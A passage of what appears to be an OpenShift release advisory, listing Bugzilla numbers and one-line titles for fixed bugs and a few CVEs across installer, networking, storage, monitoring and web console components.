endpoint 1913532 - After a 4.6 to 4.7 upgrade, a node went unready 1913974 - snapshot test periodically failing with "can't open '/mnt/test/data': No such file or directory" 1914127 - Deletion of oc get svc router-default -n openshift-ingress hangs 1914446 - openshift-service-ca-operator and openshift-service-ca pods run as root 1914994 - Panic observed in k8s-prometheus-adapter since k8s 1.20 1915122 - Size of the hostname was preventing proper DNS resolution of the worker node names 1915693 - Not able to install gpu-operator on cpumanager enabled node. 1915971 - Role and Role Binding breadcrumbs do not work as expected 1916116 - the left navigation menu would not be expanded if repeat clicking the links in Overview page 1916118 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall 1916392 - scrape priority and fairness endpoints for must-gather 1916450 - Alertmanager: add title and text fields to Adv. config. 
section of Slack Receiver form 1916489 - [sig-scheduling] SchedulerPriorities [Serial] fails with "Error waiting for 1 pods to be running - probably a timeout: Timeout while waiting for pods with labels to be ready" 1916553 - Default template's description is empty on details tab 1916593 - Destroy cluster sometimes stuck in a loop 1916872 - need ability to reconcile exgw annotations on pod add 1916890 - [OCP 4.7] api or api-int not available during installation 1917241 - [en_US] The tooltips of Created date time is not easy to read in all most of UIs. 1917282 - [Migration] MCO stucked for rhel worker after enable the migration prepare state 1917328 - It should default to current namespace when create vm from template action on details page 1917482 - periodic-ci-openshift-release-master-ocp-4.7-e2e-metal-ipi failing with "cannot go from state 'deploy failed' to state 'manageable'" 1917485 - [oVirt] ovirt machine/machineset object has missing some field validations 1917667 - Master machine config pool updates are stalled during the migration from SDN to OVNKube. 1917906 - [oauth-server] bump k8s.io/apiserver to 1.20.3 1917931 - [e2e-gcp-upi] failing due to missing pyopenssl library 1918101 - [vsphere]Delete Provisioning machine took about 12 minutes 1918376 - Image registry pullthrough does not support ICSP, mirroring e2es do not pass 1918442 - Service Reject ACL does not work on dualstack 1918723 - installer fails to write boot record on 4k scsi lun on s390x 1918729 - Add hide/reveal button for the token field in the KMS configuration page 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1918785 - Pod request and limit calculations in console are incorrect 1918910 - Scale from zero annotations should not requeue if instance type missing 1919032 - oc image extract - will not extract files from image rootdir - "error: unexpected directory from mapping tests.test" 1919048 - Whereabouts IPv6 addresses not calculated when leading hextets equal 0 1919151 - [Azure] dnsrecords with invalid domain should not be published to Azure dnsZone 1919168 - oc adm catalog mirror doesn't work for the air-gapped cluster 1919291 - [Cinder-csi-driver] Filesystem did not expand for on-line volume resize 1919336 - vsphere-problem-detector should check if datastore is part of datastore cluster 1919356 - Add missing profile annotation in cluster-update-keys manifests 1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration 1919398 - Permissive Egress NetworkPolicy (0.0.0.0/0) is blocking all traffic 1919406 - OperatorHub filter heading "Provider Type" should be "Source" 1919737 - hostname lookup delays when master node down 1920209 - Multus daemonset upgrade takes the longest time in the cluster during an upgrade 1920221 - GCP jobs exhaust zone listing query quota sometimes due to too many initializations of cloud provider in tests 1920300 - cri-o does not support configuration of stream idle time 1920307 - "VM not running" should be "Guest agent required" on vm details page in dev console 1920532 - Problem in trying to connect through the service to a member that is the same as the caller. 
1920677 - Various missingKey errors in the devconsole namespace 1920699 - Operation cannot be fulfilled on clusterresourcequotas.quota.openshift.io error when creating different OpenShift resources 1920901 - [4.7]"500 Internal Error" for prometheus route in https_proxy cluster 1920903 - oc adm top reporting unknown status for Windows node 1920905 - Remove DNS lookup workaround from cluster-api-provider 1921106 - A11y Violation: button name(s) on Utilization Card on Cluster Dashboard 1921184 - kuryr-cni binds to wrong interface on machine with two interfaces 1921227 - Fix issues related to consuming new extensions in Console static plugins 1921264 - Bundle unpack jobs can hang indefinitely 1921267 - ResourceListDropdown not internationalized 1921321 - SR-IOV obliviously reboot the node 1921335 - ThanosSidecarUnhealthy 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1921720 - test: openshift-tests.[sig-cli] oc observe works as expected [Suite:openshift/conformance/parallel] 1921763 - operator registry has high memory usage in 4.7... cleanup row closes 1921778 - Push to stage now failing with semver issues on old releases 1921780 - Search page not fully internationalized 1921781 - DefaultList component not internationalized 1921878 - [kuryr] Egress network policy with namespaceSelector in Kuryr behaves differently than in OVN-Kubernetes 1921885 - Server-side Dry-run with Validation Downloads Entire OpenAPI spec often 1921892 - MAO: controller runtime manager closes event recorder 1921894 - Backport Avoid node disruption when kube-apiserver-to-kubelet-signer is rotated 1921937 - During upgrade /etc/hostname becomes a directory, nodes are set with kubernetes.io/hostname=localhost label 1921953 - ClusterServiceVersion property inference does not infer package and version 1922063 - "Virtual Machine" should be "Templates" in template wizard 1922065 - Rootdisk size is default to 15GiB in customize wizard 1922235 - [build-watch] e2e-aws-upi - e2e-aws-upi container setup failing because of Python code version mismatch 1922264 - Restore snapshot as a new PVC: RWO/RWX access modes are not click-able if parent PVC is deleted 1922280 - [v2v] on the upstream release, In VM import wizard I see RHV but no oVirt 1922646 - Panic in authentication-operator invoking webhook authorization 1922648 - FailedCreatePodSandBox due to "failed to pin namespaces [uts]: [pinns:e]: /var/run/utsns exists and is not a directory: File exists" 1922764 - authentication operator is degraded due to number of kube-apiservers 1922992 - some button text on YAML sidebar are not translated 1922997 - [Migration]The SDN migration rollback failed. 1923038 - [OSP] Cloud Info is loaded twice 1923157 - Ingress traffic performance drop due to NodePort services 1923786 - RHV UPI fails with unhelpful message when ASSET_DIR is not set. 
1923811 - Registry claims Available=True despite .status.readyReplicas == 0 while .spec.replicas == 2 1923847 - Error occurs when creating pods if configuring multiple key-only labels in default cluster-wide node selectors or project-wide node selectors 1923984 - Incorrect anti-affinity for UWM prometheus 1924020 - panic: runtime error: index out of range [0] with length 0 1924075 - kuryr-controller restart when enablePortPoolsPrepopulation = true 1924083 - "Activity" Pane of Persistent Storage tab shows events related to Noobaa too 1924140 - [OSP] Typo in OPENSHFIT_INSTALL_SKIP_PREFLIGHT_VALIDATIONS variable 1924171 - ovn-kube must handle single-stack to dual-stack migration 1924358 - metal UPI setup fails, no worker nodes 1924502 - Failed to start transient scope unit: Argument list too long / systemd[1]: Failed to set up mount unit: Invalid argument 1924536 - 'More about Insights' link points to support link 1924585 - "Edit Annotation" are not correctly translated in Chinese 1924586 - Control Plane status and Operators status are not fully internationalized 1924641 - [User Experience] The message "Missing storage class" needs to be displayed after user clicks Next and needs to be rephrased 1924663 - Insights operator should collect related pod logs when operator is degraded 1924701 - Cluster destroy fails when using byo with Kuryr 1924728 - Difficult to identify deployment issue if the destination disk is too small 1924729 - Create Storageclass for CephFS provisioner assumes incorrect default FSName in external mode (side-effect of fix for Bug 1878086) 1924747 - InventoryItem doesn't internationalize resource kind 1924788 - Not clear error message when there are no NADs available for the user 1924816 - Misleading error messages in ironic-conductor log 1924869 - selinux avc deny after installing OCP 4.7 1924916 - PVC reported as Uploading when it is actually cloning 1924917 - kuryr-controller in crash loop if IP is removed from secondary interfaces 1924953 - newly added 'excessive etcd leader changes' test case failing in serial job 1924968 - Monitoring list page filter options are not translated 1924983 - some components in utils directory not localized 1925017 - [UI] VM Details-> Network Interfaces, 'Name,' is displayed instead on 'Name' 1925061 - Prometheus backed by a PVC may start consuming a lot of RAM after 4.6 -> 4.7 upgrade due to series churn 1925083 - Some texts are not marked for translation on idp creation page. 
1925087 - Add i18n support for the Secret page 1925148 - Shouldn't create the redundant imagestream when use oc new-app --name=testapp2 -i with exist imagestream 1925207 - VM from custom template - cloudinit disk is not added if creating the VM from custom template using customization wizard 1925216 - openshift installer fails immediately failed to fetch Install Config 1925236 - OpenShift Route targets every port of a multi-port service 1925245 - oc idle: Clusters upgrading with an idled workload do not have annotations on the workload's service 1925261 - Items marked as mandatory in KMS Provider form are not enforced 1925291 - Baremetal IPI - While deploying with IPv6 provision network with subnet other than /64 masters fail to PXE boot 1925343 - [ci] e2e-metal tests are not using reserved instances 1925493 - Enable snapshot e2e tests 1925586 - cluster-etcd-operator is leaking transports 1925614 - Error: InstallPlan.operators.coreos.com not found 1925698 - On GCP, load balancers report kube-apiserver fails its /readyz check 50% of the time, causing load balancer backend churn and disruptions to apiservers 1926029 - [RFE] Either disable save or give warning when no disks support snapshot 1926054 - Localvolume CR is created successfully, when the storageclass name defined in the localvolume exists. 1926072 - Close button (X) does not work in the new "Storage cluster exists" Warning alert message(introduced via fix for Bug 1867400) 1926082 - Insights operator should not go degraded during upgrade 1926106 - [ja_JP][zh_CN] Create Project, Delete Project and Delete PVC modal are not fully internationalized 1926115 - Texts in “Insights” popover on overview page are not marked for i18n 1926123 - Pseudo bug: revert "force cert rotation every couple days for development" in 4.7 1926126 - some kebab/action menu translation issues 1926131 - Add HPA page is not fully internationalized 1926146 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it 1926154 - Create new pool with arbiter - wrong replica 1926278 - [oVirt] consume K8S 1.20 packages 1926279 - Pod ignores mtu setting from sriovNetworkNodePolicies in case of PF partitioning 1926285 - ignore pod not found status messages 1926289 - Accessibility: Modal content hidden from screen readers 1926310 - CannotRetrieveUpdates alerts on Critical severity 1926329 - [Assisted-4.7][Staging] monitoring stack in staging is being overloaded by the amount of metrics being exposed by assisted-installer pods and scraped by prometheus. 1926336 - Service details can overflow boxes at some screen widths 1926346 - move to go 1.15 and registry.ci.openshift.org 1926364 - Installer timeouts because proxy blocked connection to Ironic API running on bootstrap VM 1926465 - bootstrap kube-apiserver does not have --advertise-address set – was: [BM][IPI][DualStack] Installation fails cause Kubernetes service doesn't have IPv6 endpoints 1926484 - API server exits non-zero on 2 SIGTERM signals 1926547 - OpenShift installer not reporting IAM permission issue when removing the Shared Subnet Tag 1926579 - Setting .spec.policy is deprecated and will be removed eventually. 
Please use .spec.profile instead is being logged every 3 seconds in scheduler operator log 1926598 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results 1926776 - "Template support" modal appears when select the RHEL6 common template 1926835 - [e2e][automation] prow gating use unsupported CDI version 1926843 - pipeline with finally tasks status is improper 1926867 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade 1926893 - When deploying the operator via OLM (after creating the respective catalogsource), the deployment "lost" the resources section. 1926903 - NTO may fail to disable stalld when relying on Tuned '[service]' plugin 1926931 - Inconsistent ovs-flow rule on one of the app node for egress node 1926943 - vsphere-problem-detector: Alerts in CI jobs 1926977 - [sig-devex][Feature:ImageEcosystem][Slow] openshift sample application repositories rails/nodejs 1927013 - Tables don't render properly at smaller screen widths 1927017 - CCO does not relinquish leadership when restarting for proxy CA change 1927042 - Empty static pod files on UPI deployments are confusing 1927047 - multiple external gateway pods will not work in ingress with IP fragmentation 1927068 - Workers fail to PXE boot when IPv6 provisionining network has subnet other than /64 1927075 - [e2e][automation] Fix pvc string in pvc.view 1927118 - OCP 4.7: NVIDIA GPU Operator DCGM metrics not displayed in OpenShift Console Monitoring Metrics page 1927244 - UPI installation with Kuryr timing out on bootstrap stage 1927263 - kubelet service takes around 43 secs to start container when started from stopped state 1927264 - FailedCreatePodSandBox due to multus inability to reach apiserver 1927310 - Performance: Console makes unnecessary requests for en-US messages on load 1927340 - Race condition in OperatorCondition reconcilation 1927366 - OVS configuration service unable to clone NetworkManager's connections in the overlay FS 1927391 - Fix flake in TestSyncPodsDeletesWhenSourcesAreReady 1927393 - 4.7 still points to 4.6 catalog images 1927397 - p&f: add auto update for priority & fairness bootstrap configuration objects 1927423 - Happy "Not Found" and no visible error messages on error-list page when /silences 504s 1927465 - Homepage dashboard content not internationalized 1927678 - Reboot interface defaults to softPowerOff so fencing is too slow 1927731 - /usr/lib/dracut/modules.d/30ignition/ignition --version sigsev 1927797 - 'Pod(s)' should be included in the pod donut label when a horizontal pod autoscaler is enabled 1927882 - Can't create cluster role binding from UI when a project is selected 1927895 - global RuntimeConfig is overwritten with merge result 1927898 - i18n Admin Notifier 1927902 - i18n Cluster Utilization dashboard duration 1927903 - "CannotRetrieveUpdates" - critical error in openshift web console 1927925 - Manually misspelled as Manualy 1927941 - StatusDescriptor detail item and Status component can cause runtime error when the status is an object or array 1927942 - etcd should use socket option (SO_REUSEADDR) instead of wait for port release on process restart 1927944 - cluster version operator cycles terminating state waiting for leader election 1927993 - Documentation Links in OKD Web Console are not Working 1928008 - Incorrect behavior when we click back button after viewing the node details in Internal-attached mode 1928045 - N+1 scaling Info message says "single zone" even if the nodes are spread across 2 or 0 zones 1928147 
1928157 - 4.7 CNO claims to be done upgrading before it even starts
1928164 - Traffic to outside the cluster redirected when OVN is used and NodePort service is configured
1928297 - HAProxy fails with 500 on some requests
1928473 - NetworkManager overlay FS not being created on None platform
1928512 - sap license management logs gatherer
1928537 - Cannot IPI with tang/tpm disk encryption
1928640 - Definite error message when using StorageClass based on azure-file / Premium_LRS
1928658 - Update plugins and Jenkins version to prepare openshift-sync-plugin 1.0.46 release
1928850 - Unable to pull images due to limited quota on Docker Hub
1928851 - manually creating NetNamespaces will break things and this is not obvious
1928867 - golden images - DV should not be created with WaitForFirstConsumer
1928869 - Remove css required to fix search bug in console caused by pf issue in 2021.1
1928875 - Update translations
1928893 - Memory Pressure Drop Down Info is stating "Disk" capacity is low instead of memory
1928931 - DNSRecord CRD is using deprecated v1beta1 API
1928937 - CVE-2021-23337 nodejs-lodash: command injection via template
1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions
1929052 - Add new Jenkins agent maven dir for 3.6
1929056 - kube-apiserver-availability.rules are failing evaluation
1929110 - LoadBalancer service check test fails during vsphere upgrade
1929136 - openshift isn't able to mount nfs manila shares to pods
1929175 - LocalVolumeSet: PV is created on disk belonging to other provisioner
1929243 - Namespace column missing in Nodes Node Details / pods tab
1929277 - Monitoring workloads using too high a priorityclass
1929281 - Update Tech Preview badge to transparent border color when upgrading to PatternFly v4.87.1
1929314 - ovn-kubernetes endpoint slice controller doesn't run on CI jobs
1929359 - etcd-quorum-guard uses origin-cli [4.8]
1929577 - Edit Application action overwrites Deployment envFrom values on save
1929654 - Registry for Azure uses legacy V1 StorageAccount
1929693 - Pod stuck at "ContainerCreating" status
1929733 - oVirt CSI driver operator is constantly restarting
1929769 - Getting 404 after switching user perspective in another tab and reload Project details
1929803 - Pipelines shown in edit flow for Workloads created via ContainerImage flow
1929824 - fix alerting on volume name check for vsphere
1929917 - Bare-metal operator is firing for ClusterOperatorDown for 15m during 4.6 to 4.7 upgrade
1929944 - The etcdInsufficientMembers alert fires incorrectly when any instance is down and not when quorum is lost
1930007 - filter dropdown item filter and resource list dropdown item filter doesn't support multi selection
1930015 - OS list is overlapped by buttons in template wizard
1930064 - Web console crashes during VM creation from template when no storage classes are defined
1930220 - Cinder CSI driver is not able to mount volumes under heavier load
1930240 - Generated clouds.yaml incomplete when provisioning network is disabled
1930248 - After creating a remediation flow and rebooting a worker there is no access to the openshift-web-console
1930268 - intel vfio devices are not expose as resources
1930356 - Darwin binary missing from mirror.openshift.com
1930393 - Gather info about unhealthy SAP pods
1930546 - Monitoring-dashboard-workload keep loading when user with cluster-role cluster-monitoring-view login develoer console
1930570 - Jenkins templates are displayed in Developer Catalog twice
1930620 - the logLevel field in containerruntimeconfig can't be set to "trace"
1930631 - Image local-storage-mustgather in the doc does not come from product registry
1930893 - Backport upstream patch 98956 for pod terminations
1931005 - Related objects page doesn't show the object when its name is empty
1931103 - remove periodic log within kubelet
1931115 - Azure cluster install fails with worker type workers Standard_D4_v2
1931215 - [RFE] Cluster-api-provider-ovirt should handle affinity groups
1931217 - [RFE] Installer should create RHV Affinity group for OCP cluster VMS
1931467 - Kubelet consuming a large amount of CPU and memory and node becoming unhealthy
1931505 - [IPI baremetal] Two nodes hold the VIP post remove and start of the Keepalived container
1931522 - Fresh UPI install on BM with bonding using OVN Kubernetes fails
1931529 - SNO: mentioning of 4 nodes in error message - Cluster network CIDR prefix 24 does not contain enough addresses for 4 hosts each one with 25 prefix (128 addresses)
1931629 - Conversational Hub Fails due to ImagePullBackOff
1931637 - Kubeturbo Operator fails due to ImagePullBackOff
1931652 - [single-node] etcd: discover-etcd-initial-cluster graceful termination race.
1931658 - [single-node] cluster-etcd-operator: cluster never pivots from bootstrapIP endpoint
1931674 - [Kuryr] Enforce nodes MTU for the Namespaces and Pods
1931852 - Ignition HTTP GET is failing, because DHCP IPv4 config is failing silently
1931883 - Fail to install Volume Expander Operator due to CrashLookBackOff
1931949 - Red Hat Integration Camel-K Operator keeps stuck in Pending state
1931974 - Operators cannot access kubeapi endpoint on OVNKubernetes on ipv6
1931997 - network-check-target causes upgrade to fail from 4.6.18 to 4.7
1932001 - Only one of multiple subscriptions to the same package is honored
1932097 - Apiserver liveness probe is marking it as unhealthy during normal shutdown
1932105 - machine-config ClusterOperator claims level while control-plane still updating
1932133 - AWS EBS CSI Driver doesn’t support “csi.storage.k8s.io/fsTyps” parameter
1932135 - When “iopsPerGB” parameter is not set, event for AWS EBS CSI Driver provisioning is not clear
1932152 - When “iopsPerGB” parameter is set to a wrong number, events for AWS EBS CSI Driver provisioning are not clear
1932154 - [AWS ] machine stuck in provisioned phase , no warnings or errors
1932182 - catalog operator causing CPU spikes and bad etcd performance
1932229 - Can’t find kubelet metrics for aws ebs csi volumes
1932281 - [Assisted-4.7][UI] Unable to change upgrade channel once upgrades were discovered
1932323 - CVE-2021-26540 sanitize-html: improper validation of hostnames set by the "allowedIframeHostnames" option can lead to bypass hostname whitelist for iframe element
1932324 - CRIO fails to create a Pod in sandbox stage - starting container process caused: process_linux.go:472: container init caused: Running hook #0:: error running hook: exit status 255, stdout: , stderr: \"\n"
1932362 - CVE-2021-26539 sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation
1932401 - Cluster Ingress Operator degrades if external LB redirects http to https because of new "canary" route
1932453 - Update Japanese timestamp format
1932472 - Edit Form/YAML switchers cause weird collapsing/code-folding issue
1932487 - [OKD] origin-branding manifest is missing cluster profile annotations
1932502 - Setting MTU for a bond interface using Kernel arguments is not working
1932618 - Alerts during a test run should fail the test job, but were not
1932624 - ClusterMonitoringOperatorReconciliationErrors is pending at the end of an upgrade and probably should not be
1932626 - During a 4.8 GCP upgrade OLM fires an alert indicating the operator is unhealthy
1932673 - Virtual machine template provided by red hat should not be editable. The UI allows to edit and then reverse the change after it was made
1932789 - Proxy with port is unable to be validated if it overlaps with service/cluster network
1932799 - During a hive driven baremetal installation the process does not go beyond 80% in the bootstrap VM
1932805 - e2e: test OAuth API connections in the tests by that name
1932816 - No new local storage operator bundle image is built
1932834 - enforce the use of hashed access/authorize tokens
1933101 - Can not upgrade a Helm Chart that uses a library chart in the OpenShift dev console
1933102 - Canary daemonset uses default node selector
1933114 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it [Suite:openshift/conformance/parallel/minimal]
1933159 - multus DaemonSets should use maxUnavailable: 33%
1933173 - openshift-sdn/sdn DaemonSet should use maxUnavailable: 10%
1933174 - openshift-sdn/ovs DaemonSet should use maxUnavailable: 10%
1933179 - network-check-target DaemonSet should use maxUnavailable: 10%
1933180 - openshift-image-registry/node-ca DaemonSet should use maxUnavailable: 10%
1933184 - openshift-cluster-csi-drivers DaemonSets should use maxUnavailable: 10%
1933263 - user manifest with nodeport services causes bootstrap to block
1933269 - Cluster unstable replacing an unhealthy etcd member
1933284 - Samples in CRD creation are ordered arbitarly
1933414 - Machines are created with unexpected name for Ports
1933599 - bump k8s.io/apiserver to 1.20.3
1933630 - [Local Volume] Provision disk failed when disk label has unsupported value like ":"
1933664 - Getting Forbidden for image in a container template when creating a sample app
1933708 - Grafana is not displaying deployment config resources in dashboard Default /Kubernetes / Compute Resources / Namespace (Workloads)
1933711 - EgressDNS: Keep short lived records at most 30s
1933730 - [AI-UI-Wizard] Toggling "Use extra disks for local storage" checkbox highlights the "Next" button to move forward but grays out once clicked
1933761 - Cluster DNS service caps TTLs too low and thus evicts from its cache too aggressively
1933772 - MCD Crash Loop Backoff
1933805 - TargetDown alert fires during upgrades because of normal upgrade behavior
1933857 - Details page can throw an uncaught exception if kindObj prop is undefined
1933880 - Kuryr-Controller crashes when it's missing the status object
1934021 - High RAM usage on machine api termination node system oom
1934071 - etcd consuming high amount of memory and CPU after upgrade to 4.6.17
1934080 - Both old and new Clusterlogging CSVs stuck in Pending during upgrade
1934085 - Scheduling conformance tests failing in a single node cluster
1934107 - cluster-authentication-operator builds URL incorrectly for IPv6
1934112 - Add memory and uptime metadata to IO archive
1934113 - mcd panic when there's not enough free disk space
1934123 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP
1934163 - Thanos Querier restarting and gettin alert ThanosQueryHttpRequestQueryRangeErrorRateHigh
1934174 - rootfs too small when enabling NBDE
1934176 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3
1934177 - knative-camel-operator CreateContainerError "container_linux.go:366: starting container process caused: chdir to cwd (\"/home/nonroot\") set in config.json failed: permission denied"
1934216 - machineset-controller stuck in CrashLoopBackOff after upgrade to 4.7.0
1934229 - List page text filter has input lag
1934397 - Extend OLM operator gatherer to include Operator/ClusterServiceVersion conditions
1934400 - [ocp_4][4.6][apiserver-auth] OAuth API servers are not ready - PreconditionNotReady
1934516 - Setup different priority classes for prometheus-k8s and prometheus-user-workload pods
1934556 - OCP-Metal images
1934557 - RHCOS boot image bump for LUKS fixes
1934643 - Need BFD failover capability on ECMP routes
1934711 - openshift-ovn-kubernetes ovnkube-node DaemonSet should use maxUnavailable: 10%
1934773 - Canary client should perform canary probes explicitly over HTTPS (rather than redirect from HTTP)
1934905 - CoreDNS's "errors" plugin is not enabled for custom upstream resolvers
1935058 - Can’t finish install sts clusters on aws government region
1935102 - Error: specifying a root certificates file with the insecure flag is not allowed during oc login
1935155 - IGMP/MLD packets being dropped
1935157 - [e2e][automation] environment tests broken
1935165 - OCP 4.6 Build fails when filename contains an umlaut
1935176 - Missing an indication whether the deployed setup is SNO.
1935269 - Topology operator group shows child Jobs. Not shown in details view's resources.
1935419 - Failed to scale worker using virtualmedia on Dell R640
1935528 - [AWS][Proxy] ingress reports degrade with CanaryChecksSucceeding=False in the cluster with proxy setting
1935539 - Openshift-apiserver CO unavailable during cluster upgrade from 4.6 to 4.7
1935541 - console operator panics in DefaultDeployment with nil cm
1935582 - prometheus liveness probes cause issues while replaying WAL
1935604 - high CPU usage fails ingress controller
1935667 - pipelinerun status icon rendering issue
1935706 - test: Detect when the master pool is still updating after upgrade
1935732 - Update Jenkins agent maven directory to be version agnostic [ART ocp build data]
1935814 - Pod and Node lists eventually have incorrect row heights when additional columns have long text
1935909 - New CSV using ServiceAccount named "default" stuck in Pending during upgrade
1936022 - DNS operator performs spurious updates in response to API's defaulting of daemonset's terminationGracePeriod and service's clusterIPs
1936030 - Ingress operator performs spurious updates in response to API's defaulting of NodePort service's clusterIPs field
1936223 - The IPI installer has a typo. It is missing the word "the" in "the Engine".
1936336 - Updating multus-cni builder & base images to be consistent with ART 4.8 (closed)
1936342 - kuryr-controller restarting after 3 days cluster running - pools without members
1936443 - Hive based OCP IPI baremetal installation fails to connect to API VIP port 22623
1936488 - [sig-instrumentation][Late] Alerts shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured: Prometheus query error
1936515 - sdn-controller is missing some health checks
1936534 - When creating a worker with a used mac-address stuck on registering
1936585 - configure alerts if the catalogsources are missing
1936620 - OLM checkbox descriptor renders switch instead of checkbox
1936721 - network-metrics-deamon not associated with a priorityClassName
1936771 - [aws ebs csi driver] The event for Pod consuming a readonly PVC is not clear
1936785 - Configmap gatherer doesn't include namespace name (in the archive path) in case of a configmap with binary data
1936788 - RBD RWX PVC creation with Filesystem volume mode selection is creating RWX PVC with Block volume mode instead of disabling Filesystem volume mode selection
1936798 - Authentication log gatherer shouldn't scan all the pod logs in the openshift-authentication namespace
1936801 - Support ServiceBinding 0.5.0+
1936854 - Incorrect imagestream is shown as selected in knative service container image edit flow
1936857 - e2e-ovirt-ipi-install-install is permafailing on 4.5 nightlies
1936859 - ovirt 4.4 -> 4.5 upgrade jobs are permafailing
1936867 - Periodic vsphere IPI install is broken - missing pip
1936871 - [Cinder CSI] Topology aware provisioning doesn't work when Nova and Cinder AZs are different
1936904 - Wrong output YAML when syncing groups without --confirm
1936983 - Topology view - vm details screen isntt stop loading
1937005 - when kuryr quotas are unlimited, we should not sent alerts
1937018 - FilterToolbar component does not handle 'null' value for 'rowFilters' prop
1937020 - Release new from image stream chooses incorrect ID based on status
1937077 - Blank White page on Topology
1937102 - Pod Containers Page Not Translated
1937122 - CAPBM changes to support flexible reboot modes
1937145 - [Local storage] PV provisioned by localvolumeset stays in "Released" status after the pod/pvc deleted
1937167 - [sig-arch] Managed cluster should have no crashlooping pods in core namespaces over four minutes
1937244 - [Local Storage] The model name of aws EBS doesn't be extracted well
1937299 - pod.spec.volumes.awsElasticBlockStore.partition is not respected on NVMe volumes
1937452 - cluster-network-operator CI linting fails in master branch
1937459 - Wrong Subnet retrieved for Service without Selector
1937460 - [CI] Network quota pre-flight checks are failing the installation
1937464 - openstack cloud credentials are not getting configured with correct user_domain_name across the cluster
1937466 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation
1937496 - Metrics viewer in OCP Console is missing date in a timestamp for selected datapoint
1937535 - Not all image pulls within OpenShift builds retry
1937594 - multiple pods in ContainerCreating state after migration from OpenshiftSDN to OVNKubernetes
1937627 - Bump DEFAULT_DOC_URL for 4.8
1937628 - Bump upgrade channels for 4.8
1937658 - Description for storage class encryption during storagecluster creation needs to be updated
1937666 - Mouseover on headline
1937683 - Wrong icon classification of output in buildConfig when the destination is a DockerImage
1937693 - ironic image "/" cluttered with files
1937694 - [oVirt] split ovirt providerIDReconciler logic into NodeController and ProviderIDController
1937717 - If browser default font size is 20, the layout of template screen breaks
1937722 - OCP 4.8 vuln due to BZ 1936445
1937929 - Operand page shows a 404:Not Found error for OpenShift GitOps Operator
1937941 - [RFE]fix wording for favorite templates
1937972 - Router HAProxy config file template is slow to render due to repetitive regex compilations
1938131 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go
1938321 - Cannot view PackageManifest objects in YAML on 'Home > Search' page nor 'CatalogSource details > Operators tab'
1938465 - thanos-querier should set a CPU request on the thanos-query container
1938466 - packageserver deployment sets neither CPU or memory request on the packageserver container
1938467 - The default cluster-autoscaler should get default cpu and memory requests if user omits them
1938468 - kube-scheduler-operator has a container without a CPU request
1938492 - Marketplace extract container does not request CPU or memory
1938493 - machine-api-operator declares restrictive cpu and memory limits where it should not
1938636 - Can't set the loglevel of the container: cluster-policy-controller and kube-controller-manager-recovery-controller
1938903 - Time range on dashboard page will be empty after drog and drop mouse in the graph
1938920 - ovnkube-master/ovs-node DaemonSets should use maxUnavailable: 10%
1938947 - Update blocked from 4.6 to 4.7 when using spot/preemptible instances
1938949 - [VPA] Updater failed to trigger evictions due to "vpa-admission-controller" not found
1939054 - machine healthcheck kills aws spot instance before generated
1939060 - CNO: nodes and masters are upgrading simultaneously
1939069 - Add source to vm template silently failed when no storage class is defined in the cluster
1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string
1939168 - Builds failing for OCP 3.11 since PR#25 was merged
1939226 - kube-apiserver readiness probe appears to be hitting /healthz, not /readyz
1939227 - kube-apiserver liveness probe appears to be hitting /healthz, not /livez
1939232 - CI tests using openshift/hello-world broken by Ruby Version Update
1939270 - fix co upgradeableFalse status and reason
1939294 - OLM may not delete pods with grace period zero (force delete)
1939412 - missed labels for thanos-ruler pods
1939485 - CVE-2021-20291 containers/storage: DoS via malicious image
1939547 - Include container="POD" in resource queries
1939555 - VSphereProblemDetectorControllerDegraded: context canceled during upgrade to 4.8.0
1939573 - after entering valid git repo url on add flow page, throwing warning message instead Validated
1939580 - Authentication operator is degraded during 4.8 to 4.8 upgrade and normal 4.8 e2e runs
1939606 - Attempting to put a host into maintenance mode warns about Ceph cluster health, but no storage cluster problems are apparent
1939661 - support new AWS region ap-northeast-3
1939726 - clusteroperator/network should not change condition/Degraded during normal serial test execution
1939731 - Image registry operator reports unavailable during normal serial run
1939734 - Node Fanout Causes Excessive WATCH Secret Calls, Taking Down Clusters
1939740 - dual stack nodes with OVN single ipv6 fails on bootstrap phase
1939752 - ovnkube-master sbdb container does not set requests on cpu or memory
1939753 - Delete HCO is stucking if there is still VM in the cluster
1939815 - Change the Warning Alert for Encrypted PVs in Create StorageClass(provisioner:RBD) page
1939853 - [DOC] Creating manifests API should not allow folder in the "file_name"
1939865 - GCP PD CSI driver does not have CSIDriver instance
1939869 - [e2e][automation] Add annotations to datavolume for HPP
1939873 - Unlimited number of characters accepted for base domain name
1939943 - cluster-kube-apiserver-operator check-endpoints observed a panic: runtime error: invalid memory address or nil pointer dereference
1940030 - cluster-resource-override: fix spelling mistake for run-level match expression in webhook configuration
1940057 - Openshift builds should use a wach instead of polling when checking for pod status
1940142 - 4.6->4.7 updates stick on OpenStackCinderCSIDriverOperatorCR_OpenStackCinderDriverControllerServiceController_Deploying
1940159 - [OSP] cluster destruction fails to remove router in BYON (with provider network) with Kuryr as primary network
1940206 - Selector and VolumeTableRows not i18ned
1940207 - 4.7->4.6 rollbacks stuck on prometheusrules admission webhook "no route to host"
1940314 - Failed to get type for Dashboard Kubernetes / Compute Resources / Namespace (Workloads)
1940318 - No data under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod'
1940322 - Split of dashbard is wrong, many Network parts
1940337 - rhos-ipi installer fails with not clear message when openstack tenant doesn't have flavors needed for compute machines
1940361 - [e2e][automation] Fix vm action tests with storageclass HPP
